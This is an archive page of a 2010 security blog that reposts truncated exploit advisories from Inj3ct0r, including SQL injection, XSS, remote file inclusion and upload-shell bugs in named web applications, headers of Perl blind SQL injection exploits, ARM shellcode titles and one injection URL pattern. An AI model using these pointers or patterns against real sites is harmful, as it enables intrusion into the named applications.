grab our rss feed

Information Security News and Exploits

Providing you with Security News and Exploits from all over the web.

Home

Entries for June, 2010

PHP Bible Search Xss & SQL Injection Vulnerabilities

Jun.30, 2010 in Exploits

<!DOCTYPE HTML PUBLIC ‘-//W3C//DTD HTML 4.01 Transitional//EN’><html><head><meta http-equiv=’Content-Type’ content=’text/html; charset=windows-1251′><title>PHP Bible Search Xss & SQL Injection Vulnerabilities</title><link rel=’shortcut icon’ href=’/favicon.ico’ type=’image/x-icon’><link rel=’alternate’ type=’application/rss+xml’ title=’Inj3ct0r RSS’ href=’/rss’></head><body><pre>====================================================
PHP Bible Search Xss & SQL Injection Vulnerabilities
====================================================
1-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=0
0 _ [...]

Leave a Comment

CubeCart PHP (shipkey parameter) <= 4.3.x Remote SQL Injection

Jun.30, 2010 in Exploits

<!DOCTYPE HTML PUBLIC ‘-//W3C//DTD HTML 4.01 Transitional//EN’><html><head><meta http-equiv=’Content-Type’ content=’text/html; charset=windows-1251′><title>CubeCart PHP (shipkey parameter) <= 4.3.x Remote SQL Injection</title><link rel=’shortcut icon’ href=’/favicon.ico’ type=’image/x-icon’><link rel=’alternate’ type=’application/rss+xml’ title=’Inj3ct0r RSS’ href=’/rss’></head><body><pre>==============================================================
CubeCart PHP (shipkey parameter) <= 4.3.x Remote SQL Injection
==============================================================
SQL Injection in CubeCart PHP Free & Commercial Shopping Cart Application
1. *Advisory Information*
Title: SQL Injection in CubeCart PHP Free & Commercial [...]

Leave a Comment

linux/ARM – setuid(0) & kill(-1, SIGKILL) – 28 bytes

Jun.30, 2010 in Exploits

<!DOCTYPE HTML PUBLIC ‘-//W3C//DTD HTML 4.01 Transitional//EN’><html><head><meta http-equiv=’Content-Type’ content=’text/html; charset=windows-1251′><title>linux/ARM – setuid(0) & kill(-1, SIGKILL) – 28 bytes</title><link rel=’shortcut icon’ href=’/favicon.ico’ type=’image/x-icon’><link rel=’alternate’ type=’application/rss+xml’ title=’Inj3ct0r RSS’ href=’/rss’></head><body><pre>====================================================
linux/ARM – setuid(0) & kill(-1, SIGKILL) – 28 bytes
====================================================
/*
Title: Linux/ARM – setuid(0) & kill(-1, SIGKILL) – 28 bytes
(Kill all processes)
Date: 2010-06-29
Tested: ARM926EJ-S [...]

Leave a Comment

linux/ARM – setuid(0) & execve(“/bin/sh”,”/bin/sh”,0) – 38 bytes

Jun.30, 2010 in Exploits

<!DOCTYPE HTML PUBLIC ‘-//W3C//DTD HTML 4.01 Transitional//EN’><html><head><meta http-equiv=’Content-Type’ content=’text/html; charset=windows-1251′><title>linux/ARM – setuid(0) & execve("/bin/sh","/bin/sh",0) – 38 bytes</title><link rel=’shortcut icon’ href=’/favicon.ico’ type=’image/x-icon’><link rel=’alternate’ type=’application/rss+xml’ title=’Inj3ct0r RSS’ href=’/rss’></head><body><pre>================================================================
linux/ARM – setuid(0) & execve("/bin/sh","/bin/sh",0) – 38 bytes
================================================================
/*
Title: Linux/ARM – setuid(0) & execve("/bin/sh","/bin/sh",0) – 38 bytes
Date: 2010-06-29
Tested: ARM926EJ-S rev 5 (v5l)
Author: Jonathan Salwan
Web: http://shell-storm.org [...]

Leave a Comment

Inj3ct0r’s Community => 0xr00t / Make haste to register :)

Jun.30, 2010 in Exploits

<!DOCTYPE HTML PUBLIC ‘-//W3C//DTD HTML 4.01 Transitional//EN’><html><head><meta http-equiv=’Content-Type’ content=’text/html; charset=windows-1251′><title>Inj3ct0r’s Community => 0xr00t / Make haste to register </title><link rel=’shortcut icon’ href=’/favicon.ico’ type=’image/x-icon’><link rel=’alternate’ type=’application/rss+xml’ title=’Inj3ct0r RSS’ href=’/rss’></head><body><pre>==========================================================
Inj3ct0r’s Community => 0xr00t / Make haste to register
==========================================================
opened a test forum. Please register. Registration will close 07/30/2010
0xr00t.com/index.php
Actively involved. Inactive user will be removed from the [...]

Leave a Comment

Joomla Component com_gamesbox 1.0.2 SQL Injection Vulnerability

Jun.30, 2010 in Exploits

<!DOCTYPE HTML PUBLIC ‘-//W3C//DTD HTML 4.01 Transitional//EN’><html><head><meta http-equiv=’Content-Type’ content=’text/html; charset=windows-1251′><title>Joomla Component com_gamesbox 1.0.2 SQL Injection Vulnerability</title><link rel=’shortcut icon’ href=’/favicon.ico’ type=’image/x-icon’><link rel=’alternate’ type=’application/rss+xml’ title=’Inj3ct0r RSS’ href=’/rss’></head><body><pre>===============================================================
Joomla Component com_gamesbox 1.0.2 SQL Injection Vulnerability
===============================================================
Author : v3n0m
Site : http://yogyacarderlink.web.id/
Date : [...]

Leave a Comment

Specialist Bed and Breakfast Website SQL Injection Vulnerability

Jun.30, 2010 in Exploits

<!DOCTYPE HTML PUBLIC ‘-//W3C//DTD HTML 4.01 Transitional//EN’><html><head><meta http-equiv=’Content-Type’ content=’text/html; charset=windows-1251′><title>Specialist Bed and Breakfast Website SQL Injection Vulnerability</title><link rel=’shortcut icon’ href=’/favicon.ico’ type=’image/x-icon’><link rel=’alternate’ type=’application/rss+xml’ title=’Inj3ct0r RSS’ href=’/rss’></head><body><pre>================================================================
Specialist Bed and Breakfast Website SQL Injection Vulnerability
================================================================
# Exploit Title: Specialist Bed and Breakfast website SQL injection
Vulnerability
# Date: 30/06/2010
# Author: JaMbA
#Script url: http://www.internetdm.co.uk/site/pages.php?fid=0,1,356
# Version: **N/A
# Tested on: Windows
# CVE : [...]

Leave a Comment

Joomla joomanager SQL Injection Vulnerability

Jun.30, 2010 in Exploits

<!DOCTYPE HTML PUBLIC ‘-//W3C//DTD HTML 4.01 Transitional//EN’><html><head><meta http-equiv=’Content-Type’ content=’text/html; charset=windows-1251′><title>Joomla joomanager SQL Injection Vulnerability</title><link rel=’shortcut icon’ href=’/favicon.ico’ type=’image/x-icon’><link rel=’alternate’ type=’application/rss+xml’ title=’Inj3ct0r RSS’ href=’/rss’></head><body><pre>=============================================
Joomla joomanager SQL Injection Vulnerability
=============================================
1-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=0
0 _ __ [...]

Leave a Comment

Photo Store Upload Shell Vulnerability

Jun.30, 2010 in Exploits

<!DOCTYPE HTML PUBLIC ‘-//W3C//DTD HTML 4.01 Transitional//EN’><html><head><meta http-equiv=’Content-Type’ content=’text/html; charset=windows-1251′><title>Photo Store Upload Shell Vulnerability</title><link rel=’shortcut icon’ href=’/favicon.ico’ type=’image/x-icon’><link rel=’alternate’ type=’application/rss+xml’ title=’Inj3ct0r RSS’ href=’/rss’></head><body><pre>======================================
Photo Store Upload Shell Vulnerability
======================================
##########################################
#[+] Date: 30/06/2010 #
#[+] Author: MeGo #
#[+] Tested ON :windows xP #
#[+] MY Team : Team Hacker Egypt #
#[+] Email: M3GO@live.com #
#[+] CategorY : Webapps/0day TYPE: PHP#
##########################################
{?}Dork "Copyright 2007 [...]

Leave a Comment

Joomla Component com_wmtpic SQL Injection Vulnerability

Jun.30, 2010 in Exploits

<!DOCTYPE HTML PUBLIC ‘-//W3C//DTD HTML 4.01 Transitional//EN’><html><head><meta http-equiv=’Content-Type’ content=’text/html; charset=windows-1251′><title>Joomla Component com_wmtpic SQL Injection Vulnerability</title><link rel=’shortcut icon’ href=’/favicon.ico’ type=’image/x-icon’><link rel=’alternate’ type=’application/rss+xml’ title=’Inj3ct0r RSS’ href=’/rss’></head><body><pre>=======================================================
Joomla Component com_wmtpic SQL Injection Vulnerability
=======================================================
1-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=0
0 _ __ [...]

Leave a Comment

webERP v3.11.4 Multiple Vulnerabilities

Jun.30, 2010 in Exploits

<!DOCTYPE HTML PUBLIC ‘-//W3C//DTD HTML 4.01 Transitional//EN’><html><head><meta http-equiv=’Content-Type’ content=’text/html; charset=windows-1251′><title>webERP v3.11.4 Multiple Vulnerabilities</title><link rel=’shortcut icon’ href=’/favicon.ico’ type=’image/x-icon’><link rel=’alternate’ type=’application/rss+xml’ title=’Inj3ct0r RSS’ href=’/rss’></head><body><pre>=======================================
webERP v3.11.4 Multiple Vulnerabilities
=======================================
# Title: webERP Multiple Vulnerabilities
# Author: ADEO Security
# Published: 30/06/2010
# Version: 3.11.4 (Possible all versions)
# Vendor: http://www.weberp.org
# Description: "webERP is a complete web based accounting/ERP system
that requires only a web-browser and [...]

Leave a Comment

Oxygen2PHP <= 1.1.3 (member.php) Blind SQL Injection Exploit

Jun.30, 2010 in Exploits

<!DOCTYPE HTML PUBLIC ‘-//W3C//DTD HTML 4.01 Transitional//EN’><html><head><meta http-equiv=’Content-Type’ content=’text/html; charset=windows-1251′><title>Oxygen2PHP <= 1.1.3 (member.php) Blind SQL Injection Exploit</title><link rel=’shortcut icon’ href=’/favicon.ico’ type=’image/x-icon’><link rel=’alternate’ type=’application/rss+xml’ title=’Inj3ct0r RSS’ href=’/rss’></head><body><pre>============================================================
Oxygen2PHP <= 1.1.3 (member.php) Blind SQL Injection Exploit
============================================================
#!/usr/bin/perl
#[0-Day] Oxygen2PHP <= 1.1.3 (member.php) Remote SQL Injection Exploit
#Coded By Dante90, WaRWolFz Crew
#Bug Discovered By: Dante90, WaRWolFz Crew
use LWP::UserAgent;
use HTTP::Cookies;
use strict;
my $UserName = [...]

Leave a Comment

Golf Club CMS SQL Injection Vulnerability

Jun.30, 2010 in Exploits

<!DOCTYPE HTML PUBLIC ‘-//W3C//DTD HTML 4.01 Transitional//EN’><html><head><meta http-equiv=’Content-Type’ content=’text/html; charset=windows-1251′><title>Golf Club CMS SQL Injection Vulnerability</title><link rel=’shortcut icon’ href=’/favicon.ico’ type=’image/x-icon’><link rel=’alternate’ type=’application/rss+xml’ title=’Inj3ct0r RSS’ href=’/rss’></head><body><pre>=========================================
Golf Club CMS SQL Injection Vulnerability
=========================================
# Exploit Title: Golf Club SQL injection Vulnerability
# Date: 30/06/2010
# Author: JaMbA
#Script url: http://www.internetdm.co.uk/site/pages.php?fid=0,1,362
# Version: **N/A
# Tested on: Windows
# CVE : ()
###################################################################################
#########################[ EXPL0!T ]#########################
http://server/path/pages.php?fid=0,13&pp_id=38[SQL]
###################################################################################
Greetz to : Alnjm33-virus-pal [...]

Leave a Comment

Joomla Component com_newsfeeds RFI Vulnerability

Jun.30, 2010 in Exploits

<!DOCTYPE HTML PUBLIC ‘-//W3C//DTD HTML 4.01 Transitional//EN’><html><head><meta http-equiv=’Content-Type’ content=’text/html; charset=windows-1251′><title>Joomla Component com_newsfeeds RFI Vulnerability</title><link rel=’shortcut icon’ href=’/favicon.ico’ type=’image/x-icon’><link rel=’alternate’ type=’application/rss+xml’ title=’Inj3ct0r RSS’ href=’/rss’></head><body><pre>================================================
Joomla Component com_newsfeeds RFI Vulnerability
================================================
[?] My h0m3: [http://HaCkTeCh.Org/cc& Pal-Li0n.som [...]

Leave a Comment

Web Design Noida SQL Injection Vulnerability

Jun.30, 2010 in Exploits

<!DOCTYPE HTML PUBLIC ‘-//W3C//DTD HTML 4.01 Transitional//EN’><html><head><meta http-equiv=’Content-Type’ content=’text/html; charset=windows-1251′><title>Web Design Noida SQL Injection Vulnerability</title><link rel=’shortcut icon’ href=’/favicon.ico’ type=’image/x-icon’><link rel=’alternate’ type=’application/rss+xml’ title=’Inj3ct0r RSS’ href=’/rss’></head><body><pre>============================================
Web Design Noida SQL Injection Vulnerability
============================================
__ [...]

Leave a Comment

Oxygen2PHP <= 1.1.3 (forumdisplay.php) Blind SQL Injection Exploit

Jun.30, 2010 in Exploits

<!DOCTYPE HTML PUBLIC ‘-//W3C//DTD HTML 4.01 Transitional//EN’><html><head><meta http-equiv=’Content-Type’ content=’text/html; charset=windows-1251′><title>Oxygen2PHP <= 1.1.3 (forumdisplay.php) Blind SQL Injection Exploit</title><link rel=’shortcut icon’ href=’/favicon.ico’ type=’image/x-icon’><link rel=’alternate’ type=’application/rss+xml’ title=’Inj3ct0r RSS’ href=’/rss’></head><body><pre>==================================================================
Oxygen2PHP <= 1.1.3 (forumdisplay.php) Blind SQL Injection Exploit
==================================================================
#!/usr/bin/perl
#[0-Day] Oxygen2PHP <= 1.1.3 (forumdisplay.php) Remote Blind SQL Injection Exploit
#Coded By Dante90, WaRWolFz Crew
#Bug Discovered By: Dante90, WaRWolFz Crew
use strict;
use LWP::UserAgent;
use HTTP::Request::Common;
use Time::HiRes;
use [...]

Leave a Comment

ShopCartDx <= v4.30 (products.php) Blind SQL Injection Exploit

Jun.30, 2010 in Exploits

<!DOCTYPE HTML PUBLIC ‘-//W3C//DTD HTML 4.01 Transitional//EN’><html><head><meta http-equiv=’Content-Type’ content=’text/html; charset=windows-1251′><title>ShopCartDx <= v4.30 (products.php) Blind SQL Injection Exploit</title><link rel=’shortcut icon’ href=’/favicon.ico’ type=’image/x-icon’><link rel=’alternate’ type=’application/rss+xml’ title=’Inj3ct0r RSS’ href=’/rss’></head><body><pre>==============================================================
ShopCartDx <= v4.30 (products.php) Blind SQL Injection Exploit
==============================================================
#!/usr/bin/perl
#[0-Day] ShopCartDx <= v4.30 (products.php) Remote Blind SQL Injection Exploit
#Coded By Dante90, WaRWolFz Crew
#Bug Discovered By: Dante90, WaRWolFz Crew
use strict;
use LWP::UserAgent;
use HTTP::Request::Common;
use Time::HiRes;
use [...]

Leave a Comment

ShopCartDx <= v4.30 (product_detail.php) Blind SQL Injection Exploit

Jun.30, 2010 in Exploits

<!DOCTYPE HTML PUBLIC ‘-//W3C//DTD HTML 4.01 Transitional//EN’><html><head><meta http-equiv=’Content-Type’ content=’text/html; charset=windows-1251′><title>ShopCartDx <= v4.30 (product_detail.php) Blind SQL Injection Exploit</title><link rel=’shortcut icon’ href=’/favicon.ico’ type=’image/x-icon’><link rel=’alternate’ type=’application/rss+xml’ title=’Inj3ct0r RSS’ href=’/rss’></head><body><pre>====================================================================
ShopCartDx <= v4.30 (product_detail.php) Blind SQL Injection Exploit
====================================================================
#!/usr/bin/perl
#[0-Day] ShopCartDx <= v4.30 (product_detail.php) Remote Blind SQL Injection Exploit
#Coded By Dante90, WaRWolFz Crew
#Bug Discovered By: Dante90, WaRWolFz Crew
use strict;
use LWP::UserAgent;
use HTTP::Request::Common;
use Time::HiRes;
use [...]

Leave a Comment

Oxygen2PHP <= 1.1.3 (post.php) Blind SQL Injection Exploit

Jun.30, 2010 in Exploits

<!DOCTYPE HTML PUBLIC ‘-//W3C//DTD HTML 4.01 Transitional//EN’><html><head><meta http-equiv=’Content-Type’ content=’text/html; charset=windows-1251′><title>Oxygen2PHP <= 1.1.3 (post.php) Blind SQL Injection Exploit</title><link rel=’shortcut icon’ href=’/favicon.ico’ type=’image/x-icon’><link rel=’alternate’ type=’application/rss+xml’ title=’Inj3ct0r RSS’ href=’/rss’></head><body><pre>==========================================================
Oxygen2PHP <= 1.1.3 (post.php) Blind SQL Injection Exploit
==========================================================
#!/usr/bin/perl
#[0-Day] Oxygen2PHP <= 1.1.3 (post.php) Remote Blind SQL Injection Exploit
#Coded By Dante90, WaRWolFz Crew
#Bug Discovered By: Dante90, WaRWolFz Crew
use strict;
use LWP::UserAgent;
use HTTP::Request::Common;
use Time::HiRes;
use [...]

Leave a Comment

MOHA Chat 0.1.1 XSS|HTML Injection Vulnerabilities

Jun.30, 2010 in Exploits

<!DOCTYPE HTML PUBLIC ‘-//W3C//DTD HTML 4.01 Transitional//EN’><html><head><meta http-equiv=’Content-Type’ content=’text/html; charset=windows-1251′><title>MOHA Chat 0.1.1 XSS|HTML Injection Vulnerabilities</title><link rel=’shortcut icon’ href=’/favicon.ico’ type=’image/x-icon’><link rel=’alternate’ type=’application/rss+xml’ title=’Inj3ct0r RSS’ href=’/rss’></head><body><pre>===================================================
MOHA Chat 0.1.1 XSS|HTML Injection Vulnerabilities
===================================================
1-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=0
0 _ __ [...]

Leave a Comment

« previous entries

Quote

We use Linux for all our mission-critical applications. Having the source code means that we are not held hostage by anyone's support department.

Categories
- Exploits
- News